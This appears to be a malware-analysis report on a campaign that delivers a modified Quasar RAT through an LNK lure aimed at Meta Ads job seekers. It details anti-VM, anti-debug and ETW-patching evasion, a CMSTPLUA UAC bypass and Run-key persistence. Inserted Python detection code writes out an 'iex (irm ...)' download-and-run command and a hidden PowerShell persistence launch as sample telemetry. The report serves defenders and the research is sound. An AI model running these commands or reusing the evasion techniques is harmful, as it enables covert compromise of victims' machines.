Key takeaways
- Cyble Research and Intelligence Labs (CRIL) uncovered a sophisticated multi-stage malware attack originating from an archive file that contains a malicious LNK file.
- The lure document observed in the campaign indicates that the Threat Actor (TA) is targeting job seekers and digital marketing professionals, particularly those involved with Meta Ads.
- The malware employs several techniques to detect virtual machine environments, evading detection and analysis in sandboxed or emulated environments.
- The malware uses several anti-debugging techniques to detect whether it is being debugged, making analysis or reverse engineering more difficult.
- The malware employs defense evasion techniques, including disabling event tracing and altering in-memory functions, to evade detection by security tools.
- The malware attempts to escalate privileges to administrative levels using different approaches and sets up persistence by hiding in system directories, ensuring continued execution even after system reboots.
- The malware employs AES encryption in several phases of execution to conceal the malicious payload, which is only decrypted in memory after passing anti-virtualization and anti-debugging checks. This makes it difficult for static analysis engines to detect the threat, because the payload remains hidden until runtime.
- The final stage of the attack deploys Quasar RAT, a well-known open-source remote access trojan, granting attackers full control over the compromised system. This access allows actions such as data theft, surveillance, and further exploitation of the system, making it a versatile tool for malicious purposes.
- This campaign has been attributed to a Vietnamese Threat Actor based on its specific targeting of Meta Ads digital marketing professionals and the tools employed. The tactics and techniques used in this attack closely align with a previous campaign identified in July 2022, reinforcing the connection to the same threat group.
Overview
Cyble Research and Intelligence Labs (CRIL) has uncovered a sophisticated attack campaign that likely originates from spam emails containing phishing attachments. These emails include an archive file with an LNK file disguised as a PDF file. The attack begins when the LNK file triggers PowerShell-based commands, which proceed to download and execute additional scripts hosted externally. These scripts are heavily encoded and obfuscated to evade detection by security tools. The TAs use a variety of evasion techniques, including checks for virtual machines, sandbox environments, and debugging tools, ensuring that the malicious code remains undetected and runs stealthily in non-virtualized environments while bypassing standard security defenses.
Once the environment is confirmed to be free from sandboxing or analysis, the payload is decrypted using hardcoded keys, resulting in the execution of Quasar RAT. In this final stage, attackers gain full control over the compromised system, allowing them to conduct a wide range of malicious activities, including data exfiltration, persistent access, data theft, and even deploying additional malware.
In July 2022, a Vietnamese threat group began spreading Ducktail malware, an info-stealer targeting digital marketing professionals. Over time, the group expanded its operations, distributing additional information stealers and remote access trojans (RATs). They also leveraged Malware-as-a-Service (MaaS) to facilitate payload delivery, making their campaigns more versatile and scalable.
This campaign is attributed to the Vietnamese threat group on account of several indicators: the choice of target victims, the tools employed in the attacks, the payload delivery mechanisms, and the creation of lure documents. These elements closely mirror the tactics, techniques, and procedures (TTPs) observed in earlier campaigns identified by WithSecure, further linking this campaign to the same group. We have also observed that the TA behind this campaign is delivering malware families such as Stromkitty. The figure below shows the execution flow of this campaign.
Technical Analysis
Cyble Research and Intelligence Labs (CRIL) has identified a campaign that leverages a malicious LNK file containing a PowerShell command designed to download and execute an additional PowerShell script hosted on Dropbox using the link: hxxps://www.dropbox[.]com/scl/fi/b9diosgl68vg9xlaytsbz/sav3_encrypt[.]txt?rlkey=k2ojylfvks6xyef3vb21n45gp&st=suprpdhv&dl=1. This is done using the Invoke-Expression (IEX) and Invoke-RestMethod (irm) PowerShell commands from the LNK file.
Once downloaded, the script contains two components encoded in base64: a lure PDF file and a batch file. These are decoded and saved to the Downloads folder as “PositionApplied_VoyMedia.pdf” and “output.bat”. The script then executes these files using the “Start-Process” PowerShell command.
Lure Document Analysis:
The potential target of this attack is likely job seekers or professionals in the digital marketing, e-commerce, or performance marketing sectors, particularly those specializing in Meta (Facebook, Instagram) Ads within the US. Figures 4 and 5 below show the lure document used in this campaign.
Output.bat
Upon execution, the “output.bat” file retrieves the disk drive type and manufacturer name using WMIC commands to detect if the system is running in a virtual machine. It checks for disk models such as “DADY HARDDISK”, “WDS100T2B0A” or “QEMU HARDDISK” and manufacturers like “BOCHS_”, “BXPC___”, “QEMU”, or “VirtualBox”. If any of these checks indicate a virtual environment, the script exits without further execution. However, if no virtual machine is detected, it proceeds to execute another obfuscated PowerShell script. The process tree below illustrates how the malware checks for a virtual environment.
The de-obfuscated PowerShell code is shown below.
The PowerShell script reads the content of the “output.bat” file by scanning each line that begins with “:: ” and extracts a substring. A separator is used to split the line into two sets of base64 strings. These base64 strings are then decoded and passed through an AES decryption process using a hardcoded key and IV, both of which are base64 encoded. After decryption, the data is decompressed using a GZip stream, and the resulting output is executed using Invoke-Expression by PowerShell.exe, as shown in Figure 7.
The decrypted payload is a .NET executable, which is executed in memory via Invoke-Expression. It then carries out a series of detection-evasion checks using various methods defined within the .NET loader.
Triage environment check
This method performs a check for a Triage sandbox by querying the disk drive model using the command “SELECT * FROM Win32_DiskDrive”. It retrieves the model of the disk drive and compares it with “DADY HARDDISK” or “QEMU HARDDISK”. Additionally, it checks the Triage sandbox VM’s desktop wallpaper by comparing the bytes of the current wallpaper image file with a hardcoded set of bytes. If either of these checks detects the presence of Triage, the program throws an exception and halts execution.
Checks for QEMU
This method checks if the system is running in a QEMU virtual environment by searching for specific QEMU-related files in the system directory. It iterates through all the files in the system folder and checks if any file names contain the strings “qemu-ga” or “qemuwmi”. If a match is found, the method returns true; otherwise, it returns false.
Checks for Parallels
This method checks if the system is running in a Parallels virtual environment by searching for specific Parallels-related files in the system directory. It looks for file names containing the strings “prl_sf”, “prl_tg”, or “prl_eth”. If any of these strings are found in the system folder, the method returns true; otherwise, it returns false.
Sandbox Detection
These methods are designed to detect the presence of various sandboxing solutions by checking if specific DLL modules are loaded. The malware detects Sandboxie by looking for the “SbieDll.dll” module, and if found, the method is designed to crash the Sandboxie environment. Similarly, the Comodo sandbox is identified by searching for either the “cmdvrt32.dll” or “cmdvrt64.dll” modules, while the Qihoo 360 sandbox is detected by checking for the “SxIn.dll” module. For Cuckoo sandbox detection, the method searches for the “cuckoomon.dll” module. If any of these modules are found, the method returns true, indicating a sandbox environment. In the case of Sandboxie, it deliberately crashes the environment.
Emulation environment checks
This method checks for emulation by measuring the system’s tick count before and after a 500-millisecond pause. If the time difference is less than 500 milliseconds, it suggests the system may be running in an emulated environment, returning true. Otherwise, it returns false.
Username checks
This method checks if the current system’s username matches any common usernames typically associated with virtual machines, sandboxes, or test environments. It converts the current username to lowercase and compares it against a predefined list, which includes names like “Johnson”, “Miller”, “malware”, “Sandbox”, “virus”, “John Doe”, “test user”, “sand box”, “WDAGUtilityAccount”, and “DefaultUser”. If a match is found, it returns true, indicating that the system is running in a virtual environment. Otherwise, it returns false.
Wine Emulator check
This method checks if the system is running in a Wine environment by looking for the presence of the “wine_get_unix_file_name” function in the kernel32.dll module. If the function is found, it returns true, indicating Wine is present; otherwise, it returns false.
VMware check
This method checks if the system is running in a VMware or VirtualBox virtual environment by querying “Select * from Win32_ComputerSystem”. It retrieves the manufacturer and model information of the system. If the manufacturer is “Microsoft Corporation” and the model contains “VIRTUAL”, or if the manufacturer contains “vmware”, it returns true, indicating the presence of a virtual environment. If no such conditions are met, it returns false.
KVM check
This method checks if the system is running in a KVM (Kernel-based Virtual Machine) environment by searching for specific KVM-related drivers in the system directory. It looks for file names such as “balloon.sys”, “netkvm.sys”, “vioinput”, “viofs.sys”, and “vioser.sys”. If any of these files are found, it returns true, indicating a KVM environment.
Hyper-V check
This method checks if the system is running in a Hyper-V environment by inspecting the services currently running. It looks for services with names that contain “vmbus”, “VMBusHID”, or “hyperkbd”. If any of these services are found, it returns true, indicating the presence of Hyper-V.
Check for VMware-related files
This method checks for the presence of VMware/VirtualBox-related files and directories to detect a virtual environment. It searches the system directory for specific files like “VBoxMouse.sys”, “VBoxGuest.sys”, “VBoxSF.sys”, “VBoxVideo.sys”, “vmmouse.sys”, “vboxogl.dll”, and “vmmouse.sys” that are associated with VMware or VirtualBox. Additionally, it checks for the existence of directories like “C:\Program Files\VMware” or “C:\Program Files\oracle\virtualbox guest additions”. If any of these files or directories are found, it returns true, indicating the system is running in a virtual machine.
VM Process Checks
This method checks for the presence of processes associated with virtual machine environments by looking for specific process names, such as “vboxservice”, “VGAuthService”, “vmusrvc”, and “qemu-ga”. If any of these processes are found running on the system, it returns true, indicating the presence of a virtual machine. If none of these processes are detected, it returns false.
Device Check
This method checks for the presence of specific virtual machine-related device files by attempting to open paths such as \\.\pipe\cuckoo, \\.\HGFS, \\.\vmci, \\.\VBoxMiniRdrDN, \\.\VBoxGuest, \\.\pipe\VBoxMiniRdrDN, and \\.\VBoxTrayIPC. If any of these device files are successfully opened, it closes the file and returns true, indicating the system is likely running in a virtual machine.
Operating System Edition check
This method checks if the operating system is an Enterprise, Business, or Server edition by querying the Win32_OperatingSystem class and retrieving the OS name from the “Caption” field. If the OS name contains the words “Enterprise”, “Business”, or “Server”, it returns true, indicating that the system is running one of these editions.
If any of the above-mentioned methods return “True”, the program triggers an exception, halting execution and preventing the intended malicious activity from running.
After these environment checks, the program proceeds to assess whether it is being debugged. This stage typically involves additional scrutiny for signs of a debugging process or sandbox environment, such as monitoring for attached debuggers or identifying system artifacts that suggest the program is running under observation.
DebuggerAttached
This method performs various checks to detect if a debugger is attached to the current process. It checks for a debugger using standard .NET methods and by querying system information via the “NtQueryInformationProcess” function. These checks look for specific flags, ports, and object handles that indicate the presence of a debugger. If any of these conditions are met, the methods return true, indicating that the process is being debugged.
Using NtSetInformationThread
This method attempts to hide threads from a debugger by iterating through the current process’s threads. It opens each thread and uses the “NtSetInformationThread” function to hide it. If the operation succeeds for all threads, it returns “Success”; otherwise, if an error occurs, it returns “Failed”.
Using PageGuard
This method allocates a block of memory using “VirtualAlloc” and sets specific protections to detect if a debugger is present. It writes data to the allocated memory and changes its protection to include guard pages. If an exception is triggered when executing code from this memory block, it indicates the presence of a debugger, returning false. If no exception occurs, the memory is freed, and it returns true, indicating no debugger is detected.
Using Hardware Breakpoints
This code checks for hardware breakpoints by retrieving the current thread’s context, specifically the debug registers. If any of the debug registers (Dr1, Dr2, Dr3, Dr4, Dr5, Dr6, or Dr7) contain non-zero values, it indicates the presence of a hardware breakpoint, returning true. If no breakpoints are detected, it returns false.
Debugger attach
This method attempts to prevent debugging by modifying the behavior of specific functions in ntdll.dll. It retrieves the addresses of DbgUiRemoteBreakin and DbgBreakPoint and overwrites them with custom instructions (0xCC for DbgUiRemoteBreakin and 0xC3 for DbgBreakPoint). If the memory modification is successful, it returns “Success”; otherwise, it returns “Failed”.
If any of the above methods detect that the process is being debugged, the program immediately triggers an exception. This halts further execution and prevents the program from continuing its operations.
Antivirus check
Upon execution, the program specifically checks for antivirus products like Kaspersky, BitDefender, or Avast Antivirus. However, the presence of these security products on the system does not interfere with or halt the program’s execution. It continues running as intended.
Privilege Escalation
Once the .NET executable completes its checks, it verifies whether it has administrative privileges. If not, it modifies the Process Environment Block (PEB) of the current process to change its image path and command line to “C:\Windows\explorer.exe”. After modifying the PEB, it initiates a new instance of the current process using a PowerShell command with the “-Verb runas” option, running the process in hidden mode with elevated admin privileges.
If the PowerShell method fails for any reason, the process switches to an alternate approach by invoking a COM object (CMSTPLUA) using the CLSID “3E5FC7F9-9A51-4367-9063-A120244FBEC7” with the prefix “Elevation:Administrator!new:”. It then calls ShellExec to launch a new instance of the current process with elevated administrative privileges.
Persistence
After achieving privilege escalation, the .NET executable checks the process’s origin to determine whether it is running from the “Windows” directory. If the process is not running from this directory, it sets up persistence by creating a hidden folder named “$rbx-onimai” in the “C:\Windows” directory and copies itself into this folder as “$rbx-CO2.bat”. The original file located in the “Downloads” folder is then deleted. Afterward, it initiates a new instance from the “C:\Windows\$rbx-onimai” folder using the following command.
Command: cmd.exe /C echo Start-Process -FilePath C:\Windows\$rbx-onimal\$rbx-CO2.bat -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
It also creates a Run entry by modifying the registry key “SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR” to point to the newly copied file, ensuring it runs automatically after restart.
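The chain from the LNK file to the Run key leaves a consistent trace in process-creation and registry telemetry. The following added example (not code from the article) encodes those traces as detection rules and runs them over constructed Sysmon-style records; the record fields and the DllHost surrogate shape assumed for the CMSTPLUA elevation are assumptions, not observations from the page.

```python
"""Detection rules for the LNK -> PowerShell -> output.bat -> elevation -> Run key chain."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    """Process-creation record (Sysmon Event ID 1 shape)."""
    image: str
    cmdline: str
    parent_image: str


@dataclass
class RegEvent:
    """Registry value-set record (Sysmon Event ID 13 shape)."""
    target_object: str
    details: str


CMSTPLUA_CLSID = "3E5FC7F9-9A51-4367-9063-A120244FBEC7"      # quoted in the article
WINDOWS_DOLLAR_DIR = re.compile(r"c:\\windows\\\$", re.I)    # C:\Windows\$<name> drop folder


def match_process(ev: ProcEvent) -> Optional[str]:
    """Return the name of the rule a process record trips, or None."""
    img, parent, cl = ev.image.lower(), ev.parent_image.lower(), ev.cmdline
    # LNK stage: Invoke-Expression over Invoke-RestMethod fetching a remote script.
    if (img.endswith("powershell.exe")
            and re.search(r"\b(iex|invoke-expression)\b", cl, re.I)
            and re.search(r"\b(irm|invoke-restmethod)\b", cl, re.I)
            and re.search(r"https?://", cl, re.I)):
        return "T1059.001 PowerShell download cradle"
    # output.bat stage: WMIC disk/manufacturer query spawned from cmd.exe.
    if (img.endswith("wmic.exe") and parent.endswith("cmd.exe")
            and re.search(r"\b(diskdrive|computersystem)\b", cl, re.I)):
        return "T1497 WMIC hardware query from batch file"
    # Persistence relaunch: hidden window, script under C:\Windows\$<name>.
    if WINDOWS_DOLLAR_DIR.search(cl) and re.search(r"-windowstyle\s+hidden", cl, re.I):
        return "T1547 hidden launch from C:\\Windows\\$ folder"
    # CMSTPLUA elevation (assumed to surface as a DllHost COM surrogate hosting the CLSID).
    if img.endswith("dllhost.exe") and CMSTPLUA_CLSID in cl.upper():
        return "T1218.003 CMSTPLUA COM elevation"
    return None


def match_registry(ev: RegEvent) -> Optional[str]:
    """Flag Run values whose target lives in a C:\\Windows\\$<name> folder."""
    if (re.search(r"\\currentversion\\run\\", ev.target_object, re.I)
            and WINDOWS_DOLLAR_DIR.search(ev.details)):
        return "T1547.001 Run key to C:\\Windows\\$ folder"
    return None


def scan(procs: List[ProcEvent], regs: List[RegEvent]) -> List[Tuple[str, str]]:
    """Return (evidence, rule) pairs for every record that matches a rule."""
    hits: List[Tuple[str, str]] = []
    for p in procs:
        rule = match_process(p)
        if rule:
            hits.append((p.cmdline, rule))
    for e in regs:
        rule = match_registry(e)
        if rule:
            hits.append((e.target_object, rule))
    return hits


# Constructed sample telemetry modelled on the chain in the article; not real logs.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PROC = [
    ProcEvent(PS, 'powershell -w hidden -c "iex (irm \'https://www.dropbox.com/scl/fi/EXAMPLE/sav3_encrypt.txt?dl=1\')"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\wbem\WMIC.exe", "wmic diskdrive get model",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /C echo Start-Process -FilePath C:\Windows\$rbx-onimai\$rbx-CO2.bat -WindowStyle Hidden | powershell.exe -WindowStyle Hidden",
              PS),
    ProcEvent(r"C:\Windows\System32\dllhost.exe",
              r"C:\Windows\System32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",
              r"C:\Windows\System32\svchost.exe"),
    ProcEvent(r"C:\Windows\System32\notepad.exe", "notepad.exe report.txt", r"C:\Windows\explorer.exe"),
]
SAMPLE_REG = [
    RegEvent(r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR", r"C:\Windows\$rbx-onimai\$rbx-CO2.bat"),
    RegEvent(r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive", r"C:\Program Files\Microsoft OneDrive\OneDrive.exe"),
]

if __name__ == "__main__":
    for evidence, rule in scan(SAMPLE_PROC, SAMPLE_REG):
        print(f"{rule}: {evidence}")
```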
Defense Evasion
Upon execution, the .NET executable modifies the “EtwEventWrite” function in ntdll.dll to disable event tracing by inserting specific opcodes.
- On 32-bit systems, it replaces the function with the opcodes “0xC2, 0x14”, which translates to the assembly instruction RETN 20. This causes the function to return early and bypass its normal operation.
- On 64-bit systems, it uses the opcode “0xC3”, which corresponds to the instruction RET, making the function return immediately.
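A defender can test for exactly this patch in a running process. The following added example (not code from the article) classifies a function prologue against the two byte patterns above and, on Windows, reads ntdll!EtwEventWrite from its own process; the reader helper is an assumption, and the prologues used offline are constructed.

```python
"""Classify a function prologue as an early-return stub of the kind described above."""
import ctypes
import sys
from typing import Optional

# RET on x64; RETN 20 on x86 (the article quotes the leading bytes C2 14;
# the full ret imm16 encoding is C2 14 00, so a prefix match is used).
STUB_SIGNATURES = {
    64: [(b"\xc3", "RET")],
    32: [(b"\xc2\x14", "RETN 20")],
}


def classify_prologue(prologue: bytes, bits: int) -> Optional[str]:
    """Return the stub mnemonic if the prologue begins with an early return, else None."""
    for sig, name in STUB_SIGNATURES[bits]:
        if prologue.startswith(sig):
            return name
    return None


def read_export_prologue(module: str, export: str, length: int = 8) -> bytes:
    """Windows-only (assumed helper): read the first bytes of an export in this process."""
    if sys.platform != "win32":
        raise OSError("reading ntdll exports only works on Windows")
    k32 = ctypes.windll.kernel32
    k32.GetModuleHandleW.restype = ctypes.c_void_p
    k32.GetModuleHandleW.argtypes = [ctypes.c_wchar_p]
    k32.GetProcAddress.restype = ctypes.c_void_p
    k32.GetProcAddress.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
    addr = k32.GetProcAddress(k32.GetModuleHandleW(module), export.encode())
    if not addr:
        raise OSError(f"{module}!{export} not found")
    return ctypes.string_at(addr, length)


def etw_write_is_stubbed() -> Optional[str]:
    """Check ntdll!EtwEventWrite in the current process; returns the stub name or None."""
    bits = 64 if ctypes.sizeof(ctypes.c_void_p) == 8 else 32
    return classify_prologue(read_export_prologue("ntdll.dll", "EtwEventWrite"), bits)


if __name__ == "__main__":
    if sys.platform == "win32":
        print("EtwEventWrite stub:", etw_write_is_stubbed())
    else:
        # Constructed prologues for an offline demonstration: patched vs. a normal x64 prologue.
        print(classify_prologue(b"\xc3\xcc\xcc", 64), classify_prologue(b"\x48\x83\xec\x28", 64))
```

Running the check from an EDR or an instrumented process is only meaningful after the loader has executed, since the patch is applied to the loader's own copy of ntdll.dll.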
After this, it decrypts data from its resource section labeled “1789d7d0-48bf-48f5-bad6-e0262117d577.tmp” using AES decryption with a hardcoded base64 key and IV. The decrypted data is subsequently decompressed using GZip.
Quasar RAT
In the final step, the .NET executable runs the decompressed payload using the Invoke command. The payload has been identified as Quasar RAT, but the threat actor has made several modifications, such as changing the certificate name and other references where “Quasar RAT” typically appears. These alterations are likely intended to evade detection and attribution.
Quasar RAT configuration:
| Field | Value |
| --- | --- |
| Tag | Workforce |
| version | 1.7.3 |
| Hosts | “144.76.68.248:4782;” |
| Sub-Directory | “$cnt-onimai2” |
| Install Name | “$cnt-CO2.exe” |
| Mutex | “928569f3-e524-4f67-936e-0d7f0a47cfad” |
| Startup Key | “$cnt-Onimai” |
| Log Directory name | “$cnt-Logs” |
Additional Information:
Additionally, the program includes several checks designed to detect debuggers and evaluate the system’s environment, though these specific methods are not directly called. This suggests that the TA may have implemented these checks as part of a more extensive anti-debugging or evasion mechanism. By leaving these methods dormant, the TA retains the option to enable further checks in the future, enhancing the program’s ability to evade detection or analysis in debugging or virtualized environments.
Analysis Tools check
This method checks for debugging or reverse engineering tools by looking for specific process window titles or the foreground window’s title. It looks for tools like x32dbg, x64dbg, windbg, ollydbg, dnspy, immunity debugger, hyperdbg, cheat engine, cheatengine, ida, and wireshark. If any of these tools are detected in the process list or as the current foreground window, it either closes the process or flags their presence by returning true. If none are found, it returns false.
OutputDebugString
This code attempts to detect a debugger by logging a message and checking the result of “GetLastWin32Error()”, returning true if no error is found. Additionally, it logs a specially crafted format string to potentially exploit vulnerabilities in certain debuggers like OllyDbg by flooding it with “%s” format specifiers.
Drivers Execution check
These two methods check whether unsigned drivers and test-signed drivers are allowed to run on the system by querying the system’s Code Integrity settings using NtQuerySystemInformation. This is done to evaluate whether the machine could be a malware-testing environment. If unsigned drivers are allowed, the method returns True. Similarly, if test-signed drivers are permitted, it also returns True.
Kernel Debugging check
The method checks if kernel debugging is active on the system. It does so by querying system information using the “NtQuerySystemInformation” function (with system information class ‘35’). It retrieves the status of the kernel debugger through the “SYSTEM_KERNEL_DEBUGGER_INFORMATION” structure. The method returns true if the kernel debugger is either enabled, or present but not active. Otherwise, it returns false.
This check helps determine if the system is being debugged, which can be useful in detecting potential test environments.
SecureBoot Check
The method checks if Secure Boot is enabled on the system. It queries system information using NtQuerySystemInformation with system information class 145 to retrieve the Secure Boot status via the SYSTEM_SECUREBOOT_INFORMATION structure. The method returns true if the system is Secure Boot capable and Secure Boot is enabled. Otherwise, it returns false.
Virtualization Check
This method checks if Virtualization-Based Security (VBS) is enabled on the system. It queries the system using WMI to check the encryption status of the system volume (C: drive) through the Win32_EncryptableVolume class. The method returns true if the volume’s “ProtectionStatus” is 1, indicating that encryption is enabled (suggesting VBS is active). If any errors occur during the query, the method catches the exception and returns false.
Memory Integrity check
This method checks if Memory Integrity (also known as Hypervisor-Enforced Code Integrity) is enabled on the system. It reads a specific registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity. If the Enabled value in the registry key is set to 1, the method returns true, indicating that Memory Integrity is enabled. If the key or value is not present or an error occurs, the method returns false.
Invoke Assembly check
This method checks whether the currently executing assembly (the program) is running from a different location than the application’s expected executable path. It does this by comparing the location of the executing assembly (Assembly.GetExecutingAssembly().Location) with the application’s executable path (Application.ExecutablePath). If they differ, the method returns true, indicating that the assembly may have been invoked or loaded from an unusual or external location.
The code performs several security checks to determine if the system is potentially insecure or used for malware testing. It checks conditions like whether unsigned drivers are permitted, whether Secure Boot is disabled, whether kernel debugging is active, and whether key security features like Virtualization-Based Security and Memory Integrity are turned off. It also verifies if the program is running from an unexpected location. Additionally, it cross-checks the username against a list of blacklisted names commonly associated with testing environments. If any of these checks trigger a flag, and the username matches a blacklisted name, the program throws an exception, preventing any malicious activity from proceeding.
Conclusion
This attack demonstrates a sophisticated, multi-layered approach to deploying the Quasar RAT, using a seemingly benign LNK file as the initial entry point. Through the use of sandbox evasion, anti-virtualization checks, and privilege escalation techniques (such as PowerShell and CMSTP), the TA ensures that the payload bypasses detection and establishes persistent control over compromised systems.
The use of AES encryption for the payload, along with anti-debugging techniques and advanced .NET-based obfuscation, illustrates the attackers’ strong focus on evading traditional security solutions and complicating analysis and reverse engineering. The modular structure of the attack, with some evasion techniques left unused but ready to deploy depending on the target environment, underscores the threat actor’s adaptability and capability to overcome varying levels of defense.
This campaign aligns closely with the ongoing operations of a Vietnamese threat group that has been active since July 2022. The group initially spread Ducktail malware, targeting digital marketing professionals. Over time, the group has evolved, expanding its operations by employing Malware-as-a-Service (MaaS) and replicating its tactics, techniques, and procedures (TTPs) across multiple campaigns.
Recommendations
- Ensure robust email security tools are in place to detect and block malicious email attachments, such as LNK files or suspicious links. Advanced filtering systems with AI and machine learning can help detect unusual patterns and phishing attempts that may bypass traditional security filters.
- PowerShell is a common tool leveraged in attacks. Monitor its usage through logging, restrict execution policies to signed scripts, and enforce strict policies on script execution to prevent unauthorized scripts from running. Disable or limit PowerShell on systems where it is unnecessary to mitigate risk.
- Implement security solutions that use behavioral analysis to detect unusual system activity, such as process injection, sandbox evasion techniques, or modifications to critical functions like EtwEventWrite. These tools can flag abnormal behavior in real time and stop attacks before they escalate.
- Ensure that users operate with the least privileges necessary for their roles. Limit administrative access and restrict execution of potentially harmful scripts or processes, like PowerShell, to reduce the risk of privilege escalation.
- Keep all systems, software, and antivirus solutions updated with the latest patches. Regular updates help protect against vulnerabilities that threat actors often exploit to deliver malicious payloads or execute privilege escalation techniques.
MITRE ATT&CK® Techniques
| Tactic | Technique | Procedure |
| --- | --- | --- |
| Initial Access (TA0001) | Phishing (T1566) | The LNK file in a RAR archive may be delivered through phishing or spam emails. |
| Execution (TA0002) | Command and Scripting Interpreter: PowerShell (T1059.001) | The LNK file executes PowerShell commands |
| Execution (TA0002) | Windows Command Shell (T1059.003) | Uses cmd.exe to execute wmic and findstr commands |
| Persistence (TA0003) | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001) | Adds a Run entry by modifying the registry key |
| Privilege Escalation (TA0004) | CMSTP (T1218.003) | CMSTPLUA is used for UAC bypass |
| Defense Evasion (TA0005) | Obfuscated Files or Information: LNK Icon Smuggling (T1027.012) | LNK file comes with a PDF icon |
| Defense Evasion (TA0005) | Obfuscated Files or Information: Encrypted/Encoded File (T1027.013) | TA decrypts the payload using AES decryption |
| Defense Evasion (TA0005) | Disabling Security Tools (T1562.001) | EtwEventWrite function in ntdll.dll is modified to disable event tracing |
| Defense Evasion (TA0005) | Virtualization/Sandbox Evasion (T1497) | Checks for virtual environments (e.g., QEMU, VirtualBox, VMware, Sandboxie) |
| Defense Evasion (TA0005) | Process Injection (T1055) | Invoke-Expression is used to invoke decrypted payloads |
| Discovery (TA0007) | Query Registry (T1012) | The script queries registry keys to gather system information for further checks, including checks related to virtualization. |
| Discovery (TA0007) | System Information Discovery (T1082) | Uses Windows Management Instrumentation Command-line to gather system information. |
| Command and Control (TA0011) | Encrypted Channel (T1573) | The final payload, Quasar RAT, establishes C2 communication over an encrypted channel (AES encryption used in earlier stages). |
| Command and Control (TA0011) | Application Layer Protocol (T1071) | After the payload is executed, the Quasar RAT communicates with its C2 server over standard HTTP or other application layer protocols. |
Indicators of Compromise
| Indicators | Indicator Type | Description |
| --- | --- | --- |
| dc616cc55a345e448a058368aea7c99ab9dd2a9c8ec42674312b66dbc29b7878 | SHA-256 | Career_Development_Plan_for_Meta_Ads_Specialist_Hotpoint_With_Numerical.rar |
| 3de5e0b27c69c93b4c4b4812ed4453d4b81e99b7d407640a752e62e33b1ede2a | SHA-256 | Career_Development_Plan_for_Meta_Ads_Specialist_Hotpoint_With_Numerical/Career_Development_Plan_for_Meta_Ads_Specialist_Hotpoint_With_Numerical.lnk |
| hxxps://www.dropbox.com/scl/fi/9p8no6tz85e09vg59kfwk/sav2_encrypt.txt?rlkey=hw7c83mq8uws216q3d4b1cfyi&st=4oycb9or&dl=1 | URL | URL from LNK |
| 9a00d0859bc7a81d6e289a414c39aa2bd95319fa3d1d0e5f1be6d348604d640c | SHA-256 | payload_1.ps1 (downloaded from Dropbox) |
| b35452610c2cbc5a6a2bebd82af7c3883037b40be7072e43fc5989298bb26ea5 | SHA-256 | PositionApplied_VoyMedia.pdf <space> .lnk |
| d8bc59a1acf2f9a14a2fb96de979672dbed27d798eecc9454021f352f2bf973a | SHA-256 | PositionApplied_VoyMedia.rar |
| 16ef774020e5754e4a8890789b7c798376a9521823c8897f9c97af5b33b27013 | SHA-256 | payload_1.bin |
| 8229f281a93f18612a47843aa69e94312b52180e7f775fd58e5ea04608e23bd0 | SHA-256 | LNK file delivering Stromkitty |